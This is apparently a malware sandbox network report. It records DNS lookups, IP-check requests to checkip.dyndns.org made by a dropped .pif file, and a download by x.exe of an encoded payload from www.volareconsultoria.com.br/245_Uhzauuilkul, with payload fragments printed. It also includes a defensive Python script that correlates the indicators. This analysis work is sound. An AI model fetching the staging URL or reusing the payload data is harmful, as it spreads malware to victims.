Jan 16, 2025 08:29:21.789482117 CET | 63386 | 53 | 192.168.2.4 | 1.1.1.1
Jan 16, 2025 08:29:21.796925068 CET | 53 | 63386 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 16, 2025 08:29:13.549662113 CET | 192.168.2.4 | 1.1.1.1 | 0x7b6d | Standard query (0) | www.volareconsultoria.com.br | A (IP address) | IN (0x0001) | false
Jan 16, 2025 08:29:20.871078014 CET | 192.168.2.4 | 1.1.1.1 | 0x93c | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Jan 16, 2025 08:29:21.789482117 CET | 192.168.2.4 | 1.1.1.1 | 0x21dd | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 16, 2025 08:29:14.105671883 CET | 1.1.1.1 | 192.168.2.4 | 0x7b6d | No error (0) | www.volareconsultoria.com.br | volareconsultoria.com.br | | CNAME (Canonical name) | IN (0x0001) | false
Jan 16, 2025 08:29:14.105671883 CET | 1.1.1.1 | 192.168.2.4 | 0x7b6d | No error (0) | volareconsultoria.com.br | | 50.116.86.44 | A (IP address) | IN (0x0001) | false
Jan 16, 2025 08:29:20.878156900 CET | 1.1.1.1 | 192.168.2.4 | 0x93c | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 16, 2025 08:29:20.878156900 CET | 1.1.1.1 | 192.168.2.4 | 0x93c | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Jan 16, 2025 08:29:20.878156900 CET | 1.1.1.1 | 192.168.2.4 | 0x93c | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Jan 16, 2025 08:29:20.878156900 CET | 1.1.1.1 | 192.168.2.4 | 0x93c | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Jan 16, 2025 08:29:20.878156900 CET | 1.1.1.1 | 192.168.2.4 | 0x93c | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Jan 16, 2025 08:29:20.878156900 CET | 1.1.1.1 | 192.168.2.4 | 0x93c | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Jan 16, 2025 08:29:21.796925068 CET | 1.1.1.1 | 192.168.2.4 | 0x21dd | No error (0) | reallyfreegeoip.org | | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Jan 16, 2025 08:29:21.796925068 CET | 1.1.1.1 | 192.168.2.4 | 0x21dd | No error (0) | reallyfreegeoip.org | | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Jan 16, 2025 08:29:21.796925068 CET | 1.1.1.1 | 192.168.2.4 | 0x21dd | No error (0) | reallyfreegeoip.org | | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Jan 16, 2025 08:29:21.796925068 CET | 1.1.1.1 | 192.168.2.4 | 0x21dd | No error (0) | reallyfreegeoip.org | | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Jan 16, 2025 08:29:21.796925068 CET | 1.1.1.1 | 192.168.2.4 | 0x21dd | No error (0) | reallyfreegeoip.org | | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Jan 16, 2025 08:29:21.796925068 CET | 1.1.1.1 | 192.168.2.4 | 0x21dd | No error (0) | reallyfreegeoip.org | | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Jan 16, 2025 08:29:21.796925068 CET | 1.1.1.1 | 192.168.2.4 | 0x21dd | No error (0) | reallyfreegeoip.org | | 104.21.16.1 | A (IP address) | IN (0x0001) | false
                                                                                      • www.volareconsultoria.com.br
                                                                                      • reallyfreegeoip.org
                                                                                      • checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49732 | 193.122.6.168 | 80 | 1856 | C:\Users\Public\Libraries\liuuazhU.pif
Timestamp | Bytes transferred | Direction | Data
Jan 16, 2025 08:29:20.953425884 CET | 151 | OUT | GET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Connection: Keep-Alive
Jan 16, 2025 08:29:21.591346979 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                      Date: Thu, 16 Jan 2025 07:29:21 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 104
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 16, 2025 08:29:21.595254898 CET | 127 | OUT | GET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
Jan 16, 2025 08:29:21.783902884 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                      Date: Thu, 16 Jan 2025 07:29:21 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 104
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
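Session 0 above shows the dropped liuuazhU.pif fetching http://checkip.dyndns.org/ with a fixed User-Agent and receiving the sandbox's public address back in the body, and the DNS answers further up resolve that Host through a CNAME to 193.122.6.168, the session's destination. The example below is added here and is not the report's own output: it re-parses the DNS answer rows and the session dump (columns re-separated with a pipe), joins them on the destination IP, and emits the findings an analyst would record for the session. The IP_CHECK_SERVICES list, the function names and the column separator are this example's assumptions; every host name, address and header value is taken from the tables above.

```python
"""Link HTTP session 0 above to the DNS answers and pull out the indicators worth pivoting on."""
import re
from collections import defaultdict

# Services whose only job is to tell the caller its public IP or country. Assumption of this
# example: the list is built from the names in this report's DNS table (plus the CNAME target).
IP_CHECK_SERVICES = {"checkip.dyndns.org", "checkip.dyndns.com", "reallyfreegeoip.org"}

# DNS answers copied from the report, columns re-separated with "|":
# transaction id | reply code | name | cname | address | type
DNS_ANSWERS = """\
0x7b6d|No error (0)|www.volareconsultoria.com.br|volareconsultoria.com.br||CNAME (Canonical name)
0x7b6d|No error (0)|volareconsultoria.com.br||50.116.86.44|A (IP address)
0x93c|No error (0)|checkip.dyndns.org|checkip.dyndns.com||CNAME (Canonical name)
0x93c|No error (0)|checkip.dyndns.com||193.122.6.168|A (IP address)
0x93c|No error (0)|checkip.dyndns.com||132.226.247.73|A (IP address)
0x21dd|No error (0)|reallyfreegeoip.org||104.21.96.1|A (IP address)
"""

# HTTP session 0 copied from the report (session row, first request, first response), same separator.
HTTP_SESSION = r"""Session ID|Source IP|Source Port|Destination IP|Destination Port|PID|Process
0|192.168.2.4|49732|193.122.6.168|80|1856|C:\Users\Public\Libraries\liuuazhU.pif
Jan 16, 2025 08:29:20.953425884 CET|151|OUT|GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 16, 2025 08:29:21.591346979 CET|273|IN|HTTP/1.1 200 OK
Date: Thu, 16 Jan 2025 07:29:21 GMT
Content-Type: text/html
Content-Length: 104
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
"""


def build_ip_to_names(dns_text):
    """Map every answered address to all names that lead to it, following CNAME chains."""
    cname, a_records = {}, defaultdict(set)
    for line in dns_text.splitlines():
        if not line.strip():
            continue
        _txid, _rcode, name, target, addr, rtype = line.split("|")
        if rtype.startswith("CNAME"):
            cname[name] = target
        elif rtype.startswith("A "):
            a_records[name].add(addr)
    ip_to_names = defaultdict(set)
    for name, addrs in a_records.items():
        for addr in addrs:
            ip_to_names[addr].add(name)
    for alias, target in cname.items():          # an alias resolves to whatever its chain ends at
        seen = set()
        while target in cname and target not in seen:
            seen.add(target)
            target = cname[target]
        for addr in a_records.get(target, ()):
            ip_to_names[addr].add(alias)
    return dict(ip_to_names)


def parse_http_session(text):
    """Pull the 5-tuple, process, Host, User-Agent and the echoed public IP out of one session dump."""
    lines = [l for l in text.splitlines() if l.strip()]
    cols = lines[1].split("|")                   # the row under the "Session ID | ..." header
    s = {"src_ip": cols[1], "src_port": int(cols[2]), "dst_ip": cols[3], "dst_port": int(cols[4]),
         "pid": int(cols[5]), "process": cols[6], "host": None, "user_agent": None, "external_ip": None}
    for line in lines[2:]:
        if line.startswith("User-Agent:"):
            s["user_agent"] = line.split(":", 1)[1].strip()
        elif line.startswith("Host:"):
            s["host"] = line.split(":", 1)[1].strip()
        elif line.startswith("Data Ascii:"):
            m = re.search(r"Current IP Address:\s*(\d{1,3}(?:\.\d{1,3}){3})", line)
            if m:
                s["external_ip"] = m.group(1)
    return s


def classify(session, ip_to_names):
    """Return the findings an analyst would record for the session; an empty list means nothing stood out."""
    findings = []
    names = ip_to_names.get(session["dst_ip"], set())
    if session["host"] in IP_CHECK_SERVICES or names & IP_CHECK_SERVICES:
        findings.append(f"public-IP lookup: Host {session['host']}, {session['dst_ip']} is "
                        f"{', '.join(sorted(names)) or 'unresolved in the capture'}")
    if session["external_ip"]:
        findings.append(f"sample learned its public address {session['external_ip']}")
    proc = session["process"].lower()
    if proc.startswith(r"c:\users\public") and proc.endswith(".pif"):
        findings.append(f"HTTP from a .pif under C:\\Users\\Public: {session['process']}")
    if session["user_agent"] and "MSIE 6.0" in session["user_agent"]:
        findings.append(f"User-Agent claims IE 6 on Windows NT 5.2, which no browser on this host sends: "
                        f"{session['user_agent']}")
    return findings


if __name__ == "__main__":
    for finding in classify(parse_http_session(HTTP_SESSION), build_ip_to_names(DNS_ANSWERS)):
        print("-", finding)
```

The same code covers sessions 1 and 2 unchanged, since they repeat the request from PIDs 5640 and 5956. The reason for joining on DNS rather than keying a rule on one field: a check on the Host header alone misses a client that connects to 193.122.6.168 by address, and a check on that address alone misses the other four A records the resolver returned for checkip.dyndns.com.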


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49740 | 193.122.6.168 | 80 | 5640 | C:\Users\Public\Libraries\liuuazhU.pif
Timestamp | Bytes transferred | Direction | Data
Jan 16, 2025 08:29:33.900171995 CET | 151 | OUT | GET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Connection: Keep-Alive
Jan 16, 2025 08:29:34.532540083 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                      Date: Thu, 16 Jan 2025 07:29:34 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 104
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 16, 2025 08:29:34.542181969 CET | 127 | OUT | GET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
Jan 16, 2025 08:29:34.727545023 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                      Date: Thu, 16 Jan 2025 07:29:34 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 104
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      2 | 192.168.2.4 | 49742 | 193.122.6.168 | 80 | 5956 | C:\Users\Public\Libraries\liuuazhU.pif
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Jan 16, 2025 08:29:40.961503983 CET | 151 | OUT | GET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Connection: Keep-Alive
                                                                                      Jan 16, 2025 08:29:41.597172976 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                      Date: Thu, 16 Jan 2025 07:29:41 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 104
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                      Jan 16, 2025 08:29:41.601150036 CET | 127 | OUT | GET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Jan 16, 2025 08:29:41.795888901 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                      Date: Thu, 16 Jan 2025 07:29:41 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 104
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      0 | 192.168.2.4 | 49731 | 50.116.86.44 | 443 | 6492 | C:\Users\user\AppData\Local\Temp\x.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      2025-01-16 07:29:14 UTC | 177 | OUT | GET /245_Uhzauuilkul HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Accept: */*
                                                                                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                      Host: www.volareconsultoria.com.br
                                                                                      2025-01-16 07:29:14 UTC | 209 | IN | HTTP/1.1 200 OK
                                                                                      Date: Thu, 16 Jan 2025 07:29:14 GMT
                                                                                      Server: Apache
                                                                                      Upgrade: h2,h2c
                                                                                      Connection: Upgrade, close
                                                                                      Last-Modified: Wed, 15 Jan 2025 22:09:33 GMT
                                                                                      Accept-Ranges: bytes
                                                                                      Content-Length: 764756
                                                                                      2025-01-16 07:29:14 UTC7983INData Raw: 38 6a 4a 70 47 73 6b 73 64 4b 66 59 48 53 72 6e 48 58 46 46 6f 75 50 4b 67 77 39 45 63 74 45 64 51 68 6d 31 4c 57 37 57 72 70 31 4b 76 51 63 43 54 66 6e 52 58 49 75 33 31 5a 39 55 72 50 6e 30 58 41 48 53 54 4a 72 47 31 61 5a 4b 74 75 74 6c 39 63 35 67 76 6f 74 71 71 2f 65 58 55 65 78 4b 68 2f 69 6f 6d 33 69 32 42 71 42 6a 36 55 35 32 38 37 4f 6a 62 71 76 76 70 6c 59 46 55 47 38 65 35 58 43 4a 35 68 74 38 4d 77 38 37 6b 43 58 57 65 35 37 64 48 34 52 48 43 53 71 58 43 74 4f 42 41 55 42 70 6c 69 73 71 61 76 39 65 30 41 42 68 4e 75 75 70 5a 5a 57 2f 70 44 39 67 6c 36 6c 63 2f 31 4c 43 68 4d 70 38 45 5a 6c 55 4d 44 2f 77 35 7a 53 47 67 4a 64 68 30 67 42 57 4e 30 64 35 44 4a 72 5a 68 6a 33 47 2f 52 30 78 45 74 35 6d 6e 4c 54 65 2f 47 31 73 36 7a 5a 69 39 37 6a
                                                                                      Data Ascii: 8jJpGsksdKfYHSrnHXFFouPKgw9EctEdQhm1LW7Wrp1KvQcCTfnRXIu31Z9UrPn0XAHSTJrG1aZKtutl9c5gvotqq/eXUexKh/iom3i2BqBj6U5287OjbqvvplYFUG8e5XCJ5ht8Mw87kCXWe57dH4RHCSqXCtOBAUBplisqav9e0ABhNuupZZW/pD9gl6lc/1LChMp8EZlUMD/w5zSGgJdh0gBWN0d5DJrZhj3G/R0xEt5mnLTe/G1s6zZi97j
                                                                                      2025-01-16 07:29:15 UTC8000INData Raw: 68 4a 43 5a 43 75 4e 38 46 76 55 56 61 6f 53 56 35 6b 55 46 42 48 6f 58 4a 6c 58 71 6f 31 39 2f 64 5a 54 54 63 47 77 44 51 5a 67 55 45 66 5a 74 45 70 46 43 4e 6d 62 4f 51 58 4e 65 43 50 54 55 65 7a 56 79 71 52 4f 4e 76 66 6e 2b 32 7a 39 38 69 4b 2f 57 4c 2f 64 57 72 55 43 31 4a 65 68 4f 6c 61 61 32 52 4f 35 78 6a 31 36 4b 2f 4e 38 6d 2b 32 42 75 6b 6c 75 2f 35 4f 50 38 73 34 4b 6e 79 4f 34 7a 30 42 46 36 33 63 6c 31 30 5a 79 38 6b 4a 6b 61 38 4e 58 4e 79 48 68 54 51 37 49 61 34 38 6e 79 54 58 69 6a 4d 6e 46 41 65 75 55 70 4f 6c 33 34 49 45 5a 55 43 68 39 4b 31 52 48 57 47 38 38 77 71 62 77 69 4f 6e 63 58 75 63 72 35 51 68 33 56 30 56 2f 42 75 54 35 47 69 35 78 39 6e 70 76 6d 36 6f 50 5a 6b 48 6f 6d 70 57 71 59 4c 69 4b 30 47 63 45 4e 7a 43 4b 68 38 64 32
                                                                                      Data Ascii: hJCZCuN8FvUVaoSV5kUFBHoXJlXqo19/dZTTcGwDQZgUEfZtEpFCNmbOQXNeCPTUezVyqRONvfn+2z98iK/WL/dWrUC1JehOlaa2RO5xj16K/N8m+2Buklu/5OP8s4KnyO4z0BF63cl10Zy8kJka8NXNyHhTQ7Ia48nyTXijMnFAeuUpOl34IEZUCh9K1RHWG88wqbwiOncXucr5Qh3V0V/BuT5Gi5x9npvm6oPZkHompWqYLiK0GcENzCKh8d2
                                                                                      2025-01-16 07:29:15 UTC8000INData Raw: 43 68 6c 35 66 73 4d 6d 52 75 32 52 35 78 73 46 4b 59 52 55 76 4d 79 2b 63 54 30 34 6c 61 56 63 43 44 32 38 55 78 59 74 46 55 5a 73 57 35 39 38 30 4f 43 50 64 6a 4e 69 49 4a 69 53 59 74 63 61 30 33 30 6c 6c 71 68 76 61 79 42 36 6b 41 74 47 70 4b 54 54 45 2f 52 56 62 68 51 35 38 71 74 4f 6e 6d 70 6b 79 7a 79 42 72 63 6f 43 6e 6e 52 65 6c 68 32 38 4e 39 6c 31 2b 50 6d 78 6f 68 59 42 4b 4a 35 6f 37 68 62 41 2f 45 77 79 6e 61 36 52 71 2b 39 63 73 54 6c 75 39 31 32 4d 77 51 73 31 74 45 58 48 69 2b 70 6f 6b 4a 72 6e 71 61 37 65 43 59 58 2b 42 7a 32 4c 61 32 2b 49 31 41 54 47 76 76 33 54 58 77 52 6d 38 69 4f 74 76 62 46 6b 54 43 6e 46 47 77 4d 48 4b 39 59 2b 34 46 39 68 45 65 35 65 30 2b 55 42 73 77 58 63 35 57 41 6b 2b 4d 38 30 56 6e 72 70 55 6e 6a 42 55 4a 34
                                                                                      Data Ascii: Chl5fsMmRu2R5xsFKYRUvMy+cT04laVcCD28UxYtFUZsW5980OCPdjNiIJiSYtca030llqhvayB6kAtGpKTTE/RVbhQ58qtOnmpkyzyBrcoCnnRelh28N9l1+PmxohYBKJ5o7hbA/Ewyna6Rq+9csTlu912MwQs1tEXHi+pokJrnqa7eCYX+Bz2La2+I1ATGvv3TXwRm8iOtvbFkTCnFGwMHK9Y+4F9hEe5e0+UBswXc5WAk+M80VnrpUnjBUJ4
                                                                                      2025-01-16 07:29:15 UTC8000INData Raw: 32 4e 5a 35 33 54 38 4c 4b 54 43 31 6c 73 47 30 39 52 47 77 32 4d 6f 6e 44 6e 42 43 69 77 42 64 67 64 7a 7a 54 58 42 50 4e 48 38 46 57 53 41 2f 30 7a 2b 46 34 67 2b 79 2f 47 6e 65 57 54 48 2f 78 6e 68 33 71 42 6b 76 79 53 6f 6d 49 67 47 6b 79 75 67 47 79 35 58 5a 4c 61 6d 69 43 6f 52 70 68 75 56 62 4c 78 4b 6c 39 79 2b 74 78 55 4f 73 57 73 56 71 6e 38 66 70 36 78 74 5a 62 7a 58 43 37 7a 74 4c 52 68 44 4e 79 33 55 5a 4a 76 6a 30 49 36 72 50 73 2f 54 71 4c 50 68 78 70 56 4c 32 38 45 42 49 4b 46 32 59 4c 32 78 64 78 63 6a 31 58 73 61 78 61 68 51 68 73 39 30 6b 2f 2b 51 50 4f 54 6c 52 7a 45 7a 2f 6c 42 6b 70 57 49 67 4a 70 5a 48 77 6b 4a 73 49 52 30 46 69 6a 45 70 31 78 72 6d 4f 4f 42 72 71 75 75 52 50 4d 45 58 6c 43 72 42 51 35 52 70 72 63 32 63 35 51 48 7a
                                                                                      Data Ascii: 2NZ53T8LKTC1lsG09RGw2MonDnBCiwBdgdzzTXBPNH8FWSA/0z+F4g+y/GneWTH/xnh3qBkvySomIgGkyugGy5XZLamiCoRphuVbLxKl9y+txUOsWsVqn8fp6xtZbzXC7ztLRhDNy3UZJvj0I6rPs/TqLPhxpVL28EBIKF2YL2xdxcj1XsaxahQhs90k/+QPOTlRzEz/lBkpWIgJpZHwkJsIR0FijEp1xrmOOBrquuRPMEXlCrBQ5Rprc2c5QHz
                                                                                      2025-01-16 07:29:15 UTC8000INData Raw: 65 47 77 48 43 67 74 79 76 75 47 7a 56 51 73 31 66 4e 57 4d 75 47 6e 66 56 67 75 72 56 6a 32 70 72 49 62 71 30 6b 51 5a 6c 62 4b 59 61 47 36 6c 4a 52 72 70 67 4e 53 31 36 33 69 68 55 2f 52 79 35 4a 54 43 78 2b 69 6d 46 54 74 35 5a 63 4b 4b 45 65 72 6b 55 34 4d 6d 34 30 6f 79 31 44 57 42 39 58 42 37 4f 78 50 77 4c 50 78 35 53 51 68 4c 68 52 34 38 77 4a 69 52 4f 57 75 73 59 30 53 79 55 30 66 35 7a 71 41 71 58 6d 47 6d 44 58 6e 4d 4f 44 56 69 32 6f 5a 74 44 41 36 6c 6d 78 75 55 72 73 65 45 2f 6d 52 42 77 32 34 74 69 39 34 68 4d 47 79 51 6b 6c 52 5a 33 72 6a 38 46 79 37 49 2b 75 35 71 57 6c 69 42 48 2f 33 66 41 6d 56 68 76 53 44 49 48 43 62 4d 2f 38 6f 6f 78 5a 43 32 4e 48 66 34 46 57 47 74 32 6d 6f 31 58 4a 33 4b 48 4c 6f 77 58 6f 33 6c 43 47 39 6b 59 74 4c
                                                                                      Data Ascii: eGwHCgtyvuGzVQs1fNWMuGnfVgurVj2prIbq0kQZlbKYaG6lJRrpgNS163ihU/Ry5JTCx+imFTt5ZcKKEerkU4Mm40oy1DWB9XB7OxPwLPx5SQhLhR48wJiROWusY0SyU0f5zqAqXmGmDXnMODVi2oZtDA6lmxuUrseE/mRBw24ti94hMGyQklRZ3rj8Fy7I+u5qWliBH/3fAmVhvSDIHCbM/8ooxZC2NHf4FWGt2mo1XJ3KHLowXo3lCG9kYtL
                                                                                      2025-01-16 07:29:15 UTC8000INData Raw: 47 68 69 30 6f 77 6f 44 59 72 4e 66 33 76 69 4f 66 76 48 76 67 6c 58 56 76 2f 54 73 30 39 4f 33 77 72 2f 34 71 74 4a 53 51 50 51 64 74 71 50 61 65 4e 74 4b 32 6d 30 4c 51 31 30 76 5a 6e 4d 55 2f 31 38 6f 37 53 48 58 52 67 50 31 4a 76 4f 35 67 59 5a 46 41 41 7a 45 52 38 2b 6c 66 59 43 65 69 4a 58 5a 69 43 39 7a 6c 52 63 50 38 78 35 59 6c 59 62 37 6b 59 44 5a 57 76 66 74 65 61 34 72 48 5a 30 56 5a 51 47 4c 67 6b 62 68 74 4e 79 51 6b 50 65 63 6d 4a 71 63 57 72 38 69 67 77 30 71 77 57 4a 47 57 39 6c 35 64 47 74 67 7a 6d 35 58 66 56 65 2f 77 69 4c 77 53 48 6d 73 69 7a 63 57 64 68 57 48 70 34 6c 62 42 33 48 63 57 6e 4b 39 6f 37 57 53 52 43 52 75 4c 69 6e 6f 6f 30 55 71 2f 65 74 78 71 2f 73 43 37 58 70 52 33 32 39 35 6c 48 46 6e 54 66 6b 51 48 4b 44 77 58 73 66
                                                                                      Data Ascii: Ghi0owoDYrNf3viOfvHvglXVv/Ts09O3wr/4qtJSQPQdtqPaeNtK2m0LQ10vZnMU/18o7SHXRgP1JvO5gYZFAAzER8+lfYCeiJXZiC9zlRcP8x5YlYb7kYDZWvftea4rHZ0VZQGLgkbhtNyQkPecmJqcWr8igw0qwWJGW9l5dGtgzm5XfVe/wiLwSHmsizcWdhWHp4lbB3HcWnK9o7WSRCRuLinoo0Uq/etxq/sC7XpR3295lHFnTfkQHKDwXsf
                                                                                      2025-01-16 07:29:15 UTC8000INData Raw: 42 30 37 76 2b 58 73 61 74 71 55 66 62 30 52 35 7a 4f 67 79 2b 57 47 79 75 33 70 42 49 57 63 51 36 53 76 35 57 30 51 75 55 5a 43 73 6d 4a 4c 4e 58 6a 4b 34 6b 4a 75 63 75 70 70 79 55 4b 42 50 30 6c 79 51 6b 6b 6e 49 31 67 75 4c 55 30 76 73 46 75 4d 61 56 73 68 49 33 68 53 6e 42 4d 78 67 56 66 65 4b 67 30 2f 6b 6c 6b 35 30 4e 45 63 50 44 67 6c 4e 57 45 6e 79 78 49 54 41 51 55 46 4f 69 6d 30 71 52 43 53 6c 50 6c 35 54 2f 46 6c 76 77 43 50 6a 35 50 7a 59 33 35 6a 6e 73 38 30 62 5a 4a 66 71 2f 58 43 4d 6f 6a 61 37 6b 31 53 64 51 41 70 50 77 51 35 73 6b 4a 6b 69 70 6c 39 4c 36 6f 6a 2b 51 37 36 53 6c 51 78 6c 4f 63 6c 65 4f 64 32 72 35 6f 52 4b 4b 70 6e 32 67 70 44 4b 5a 42 63 41 7a 50 73 59 45 2f 62 76 6d 55 64 78 53 55 7a 6b 56 46 5a 75 78 4a 43 54 70 4f 52
                                                                                      Data Ascii: B07v+XsatqUfb0R5zOgy+WGyu3pBIWcQ6Sv5W0QuUZCsmJLNXjK4kJucuppyUKBP0lyQkknI1guLU0vsFuMaVshI3hSnBMxgVfeKg0/klk50NEcPDglNWEnyxITAQUFOim0qRCSlPl5T/FlvwCPj5PzY35jns80bZJfq/XCMoja7k1SdQApPwQ5skJkipl9L6oj+Q76SlQxlOcleOd2r5oRKKpn2gpDKZBcAzPsYE/bvmUdxSUzkVFZuxJCTpOR
